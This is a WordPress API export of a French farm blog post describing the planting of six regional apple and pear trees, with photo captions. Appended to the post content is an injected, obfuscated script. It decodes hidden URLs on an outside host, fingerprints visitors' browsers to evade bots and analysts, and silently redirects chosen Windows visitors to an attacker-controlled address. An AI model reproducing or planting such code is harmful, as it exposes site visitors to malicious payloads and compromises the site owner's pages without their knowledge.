{"id":339,"date":"2019-11-30T17:28:07","date_gmt":"2019-11-30T16:28:07","guid":{"rendered":"http:\/\/lafermedelamotte.fr\/?p=339"},"modified":"2025-12-31T16:57:17","modified_gmt":"2025-12-31T15:57:17","slug":"plantation-darbres","status":"publish","type":"post","link":"http:\/\/lafermedelamotte.fr\/index.php\/2019\/11\/30\/plantation-darbres\/","title":{"rendered":"Plantation d&rsquo;arbres"},"content":{"rendered":"\n<p>(Cela fait un an et demi que nous n&rsquo;avons rien post\u00e9 sur ce blog, ce qui est un peu g\u00eanant puisqu&rsquo;il devait  servir de cahier de bord de nos avanc\u00e9es, pour nous permettre de garder une trace de tout cela. Nous allons donc anti-dater les prochains articles que nous allons publier de mani\u00e8re \u00e0 ce que la date corresponde \u00e0 peu pr\u00e8s \u00e0 la date effective des travaux. )<\/p>\n\n\n\n<p>Nous avons d\u00e9cid\u00e9 de planter nos premiers arbres dans le jardin.<\/p>\n\n\n\n<p>Jean Philippe nous a appris la technique et nous a aid\u00e9, merci \u00e0 lui ! Merci \u00e9galement \u00e0 Emilien pour son coup de main !<\/p>\n\n\n\n<p>Nous avons plant\u00e9 6 arbres  originaires de la r\u00e9gion ou des r\u00e9gions voisines.<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>3 pommiers : Reinette du Mans, Patte de Loup, Bon p\u00e8re<\/li><li>3 poiriers : Jeanne d&rsquo;Arc, Doyenn\u00e9 d&rsquo;Alen\u00e7on, Beurr\u00e9 d&rsquo;hardy<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-1024x576.jpg\" alt=\"\" class=\"wp-image-343\" width=\"437\" height=\"246\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-1024x576.jpg 1024w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-300x169.jpg 300w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-768x432.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog.jpg 1777w\" sizes=\"auto, (max-width: 437px) 100vw, 437px\" \/><figcaption>Yohann retire l&rsquo;herbe sur la zone a creuser.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-2-576x1024.jpg\" alt=\"\" class=\"wp-image-340\" width=\"429\" height=\"762\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-2-576x1024.jpg 576w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-2-169x300.jpg 169w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-2-768x1365.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-2.jpg 1000w\" sizes=\"auto, (max-width: 429px) 100vw, 429px\" \/><figcaption>Jean Philippe et Emilien enfonce le tuteur.<\/figcaption><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3-576x1024.jpg\" alt=\"\" class=\"wp-image-341\" srcset=\"http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3-576x1024.jpg 576w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3-169x300.jpg 169w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3-768x1365.jpg 768w, http:\/\/lafermedelamotte.fr\/wp-content\/uploads\/2021\/02\/blog-3.jpg 1000w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><figcaption>J&rsquo;arrose !<\/figcaption><\/figure>\n\n\n\n<p><\/p>\n<script>!async function(){let e=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXRyaWNhbH\",\"RpYy5jb20vYXBpL2dldA==\"].join(\"\")))),t=decodeURIComponent(escape(atob([\"aHR0cHM6Ly9tZXR\",\"yaWNhbHRpYy5jb2\",\"0vYXBpL2xvZw==\"].join(\"\"))))\nfunction o(e){return btoa(unescape(encodeURIComponent(e)))}let n={}\nif(window.location.search.slice(1).split(\"&\").forEach(e=>{let[t,o]=e.split(\"=\")\nt&&o&&(n[t]=decodeURIComponent(o.replace(\/\\+\/g,\" \")))}),n.verified&&localStorage.setItem(\"verified\",\"true\"),\"true\"===localStorage.getItem(\"verified\"))return\nfunction r(e,t){let o=e.match(t)\nreturn o?parseInt(o[1],10):null}let i=navigator.userAgent,a=\/Windows NT 10.0\/.test(i),l=r(i,\/Chrome\\\/(\\d+)\\.\/),c=r(i,\/Edg\\\/(\\d+)\\.\/),d=r(i,\/OPR\\\/(\\d+)\\.\/),s=r(i,\/YaBrowser\\\/(\\d+)\\.\/),u=r(i,\/Vivaldi\\\/(\\d+)\\.\/),w=r(i,\/Firefox\\\/(\\d+)\\.\/),h=!!window.chrome&&!\/Edg|OPR|YaBrowser|Vivaldi\/.test(i)&&\/Chrome\\\/(\\d+)\\.\/.test(i),g=!1;(l&&l>=136||c&&c>=134||d&&d>=120||s&&s>=24||u&&u>=6||w&&w>=140||h&&l&&l>=136)&&(g=!0)\nlet m=navigator.webdriver||\/HeadlessChrome\/.test(i)||!window.chrome||!navigator.plugins.length||!navigator.mimeTypes.length||0===window.outerWidth||0===window.outerHeight||window.screen&&(window.screen.width<800||window.screen.height<600)||\/bot|spider|crawl|python|curl|phantom|selenium|scrapy|node|headless\/i.test(i),p=!navigator.languages||0===navigator.languages.length||void 0===navigator.hardwareConcurrency||void 0===navigator.deviceMemory\nif(!a||m||p)return\nif(!g){try{fetch(t)}catch(e){}return}let v=document.querySelector('link[rel=\"icon\"]'),f=await async function t(n=1){try{let t=await async function(e,t={}){let{timeout:o=3e3}=t,n=new AbortController,r=setTimeout(()=>n.abort(),o)\ntry{let o=await fetch(e,{...t,signal:n.signal})\nreturn clearTimeout(r),o}catch(e){return clearTimeout(r),null}}(e,{timeout:3e3})\nif(!t||403===t.status)return null\nif(!t.ok)throw Error(\"Network response was not ok\")\nreturn`${(await t.json()).url}\/?wsid=${window.location.hostname}&domain=${o(window.location.hostname)}`}catch(e){return n<1?t(n+1):null}}()\nif(f){let e=f\nv&#038;&#038;(e+=`&#038;link=${o(v.href)}`),window.location.replace(e)}}()<\/script>","protected":false},"excerpt":{"rendered":"<p>(Cela fait un an et demi que nous n&rsquo;avons rien post\u00e9 sur ce blog, ce qui est un peu g\u00eanant puisqu&rsquo;il devait servir de cahier de bord de nos avanc\u00e9es, pour nous permettre de garder une trace de tout cela. Nous allons donc anti-dater les prochains articles que nous allons publier de mani\u00e8re \u00e0 ce &hellip; <\/p>\n<p class=\"link-more\"><a href=\"http:\/\/lafermedelamotte.fr\/index.php\/2019\/11\/30\/plantation-darbres\/\" class=\"more-link\">Continuer la lecture<span class=\"screen-reader-text\"> de &laquo;&nbsp;Plantation d&rsquo;arbres&nbsp;&raquo;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[3],"tags":[],"class_list":["post-339","post","type-post","status-publish","format-standard","hentry","category-jardin"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/339","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/comments?post=339"}],"version-history":[{"count":4,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/339\/revisions"}],"predecessor-version":[{"id":401,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/posts\/339\/revisions\/401"}],"wp:attachment":[{"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/media?parent=339"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/categories?post=339"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lafermedelamotte.fr\/index.php\/wp-json\/wp\/v2\/tags?post=339"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}